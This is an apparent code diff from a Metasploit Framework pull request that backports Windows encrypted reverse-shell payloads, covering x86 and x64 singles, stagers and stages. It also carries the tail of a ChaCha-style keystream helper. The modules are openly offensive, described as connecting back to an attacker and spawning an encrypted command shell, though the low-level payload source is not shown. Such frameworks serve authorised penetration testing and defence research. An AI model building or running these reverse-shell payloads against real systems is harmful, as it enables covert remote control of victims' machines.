+          keystream_arr << (keystream_ch >> 16 & 0xff)
+          keystream_arr << (keystream_ch >> 24 & 0xff)
+        end
+
+        keystream_arr
+      end
+
+      def rotate(v, c)
+        ((v << c) & 0xffffffff) | v >> (32 - c)
+      end
+
+      def quarter_round(x, a, b, c, d)
+        x[a] = (x[a] + x[b]) & 0xffffffff
+        x[d] = rotate(x[d] ^ x[a], 16)
+        x[c] = (x[c] + x[d]) & 0xffffffff
+        x[b] = rotate(x[b] ^ x[c], 12)
+        x[a] = (x[a] + x[b]) & 0xffffffff
+        x[d] = rotate(x[d] ^ x[a], 8)
+        x[c] = (x[c] + x[d]) & 0xffffffff
+        x[b] = rotate(x[b] ^ x[c], 7)
+      end
+    end
+  end
+end

--- a/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb
@@ -1,0 +1,38 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/encrypted_shell'
+require 'msf/base/sessions/command_shell_options'
+require 'msf/core/payload/windows/encrypted_reverse_tcp'
+require 'msf/core/payload/windows/encrypted_payload_opts'
+
+module MetasploitModule
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+  include Msf::Payload::Windows::EncryptedReverseTcp
+  include Msf::Payload::Windows::EncryptedPayloadOpts
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'            => 'Windows Encrypted Reverse Shell',
+      'Description'     => 'Connect back to attacker and spawn an encrypted command shell',
+      'Author'          =>
+      [
+        'Matt Graeber',
+        'Shelby Pace'
+      ],
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'win',
+      'Arch'            => ARCH_X86,
+      'Handler'         => Msf::Handler::ReverseTcp,
+      'Session'         => Msf::Sessions::EncryptedShell,
+      'DefaultOptions'  => { 'LinkerScript' => "#{LINK_SCRIPT_PATH}/func_order.ld" },
+      'Dependencies'    => [ Metasploit::Framework::Compiler::Mingw::X86 ]
+      ))
+  end
+end

--- a/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb
@@ -1,0 +1,37 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/encrypted_shell'
+require 'msf/base/sessions/command_shell_options'
+require 'msf/core/payload/windows/encrypted_reverse_tcp'
+
+module MetasploitModule
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+  include Msf::Payload::Windows::EncryptedReverseTcp
+  include Msf::Payload::Windows::EncryptedPayloadOpts
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'            => 'Windows Encrypted Reverse Shell',
+      'Description'     => 'Connect back to attacker and spawn an encrypted command shell',
+      'Author'          =>
+      [
+        'Matt Graeber',
+        'Shelby Pace'
+      ],
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'win',
+      'Arch'            => ARCH_X64,
+      'Handler'         => Msf::Handler::ReverseTcp,
+      'Session'         => Msf::Sessions::EncryptedShell,
+      'DefaultOptions'  => { 'LinkerScript' => "#{LINK_SCRIPT_PATH}/func_order64.ld" },
+      'Dependencies'    => [ Metasploit::Framework::Compiler::Mingw::X64 ]
+      ))
+  end
+end

--- a/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb
@@ -1,0 +1,34 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/windows/encrypted_reverse_tcp'
+
+module MetasploitModule
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Windows::EncryptedReverseTcp
+  include Msf::Payload::Windows::EncryptedPayloadOpts
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'            => 'Encrypted Reverse TCP Stager',
+      'Description'     => 'Connect to MSF and read in stage',
+      'Author'          =>
+      [
+        'Matt Graeber',
+        'Shelby Pace'
+      ],
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'win',
+      'Arch'            => ARCH_X86,
+      'Handler'         => Msf::Handler::ReverseTcp,
+      'Convention'      => 'sockedi',
+      'Stager'          => { 'RequiresMidstager' => false },
+      'DefaultOptions'  => { 'LinkerScript' => "#{LINK_SCRIPT_PATH}/func_order.ld" },
+      'Dependencies'    => [ Metasploit::Framework::Compiler::Mingw::X86 ]
+    ))
+  end
+end

--- a/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb
@@ -1,0 +1,34 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/windows/encrypted_reverse_tcp'
+
+module MetasploitModule
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Windows::EncryptedReverseTcp
+  include Msf::Payload::Windows::EncryptedPayloadOpts
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'            => 'Encrypted Reverse TCP Stager',
+      'Description'     => 'Connect to MSF and read in stage',
+      'Author'          =>
+      [
+        'Matt Graeber',
+        'Shelby Pace'
+      ],
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'win',
+      'Arch'            => ARCH_X64,
+      'Handler'         => Msf::Handler::ReverseTcp,
+      'Convention'      => 'sockedi',
+      'Stager'          => { 'RequiresMidstager' => false },
+      'DefaultOptions'  => { 'LinkerScript' => "#{LINK_SCRIPT_PATH}/func_order64.ld" },
+      'Dependencies'    => [ Metasploit::Framework::Compiler::Mingw::X64 ]
+    ))
+  end
+end

--- a/modules/payloads/stages/windows/encrypted_shell.rb
+++ b/modules/payloads/stages/windows/encrypted_shell.rb
@@ -1,0 +1,32 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/base/sessions/encrypted_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Windows::EncryptedPayloadOpts
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'            => 'Windows Command Shell',
+      'Description'     => 'Spawn a piped command shell (staged)',
+      'Author'          =>
+      [
+        'Matt Graeber',
+        'Shelby Pace'
+      ],
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'win',
+      'Arch'            => ARCH_X86,
+      'Session'         => Msf::Sessions::EncryptedShell,
+      'Dependencies'    => [ Metasploit::Framework::Compiler::Mingw::X86 ],
+      'PayloadCompat'   => { 'Convention' => 'sockedi' }
+     ))
+  end
+end

--- a/modules/payloads/stages/windows/x64/encrypted_shell.rb
+++ b/modules/payloads/stages/windows/x64/encrypted_shell.rb
@@ -1,0 +1,34 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/base/sessions/encrypted_shell'
+require 'msf/base/sessions/command_shell_options'
+require 'msf/core/payload/windows/encrypted_reverse_tcp'
+
+module MetasploitModule
+
+  include Msf::Payload::Windows
+  include Msf::Sessions::CommandShellOptions
+  include Msf::Payload::Windows::EncryptedReverseTcp
+  include Msf::Payload::Windows::EncryptedPayloadOpts
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'            => 'Windows Command Shell',
+      'Description'     => 'Spawn a piped command shell (staged)',
+      'Author'          =>
+      [
+        'Matt Graeber',
+        'Shelby Pace'
+      ],
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'win',
+      'Arch'            => ARCH_X64,
+      'Session'         => Msf::Sessions::EncryptedShell,
+      'Dependencies'    => [ Metasploit::Framework::Compiler::Mingw::X64 ],
+      'PayloadCompat'   => { 'Convention' => 'sockedi' }
+     ))
+  end
+end


### PR DESCRIPTION
This backports #12530 to 4.x, this should be merged as a fast-forward.

## Verification

Tests from #12530
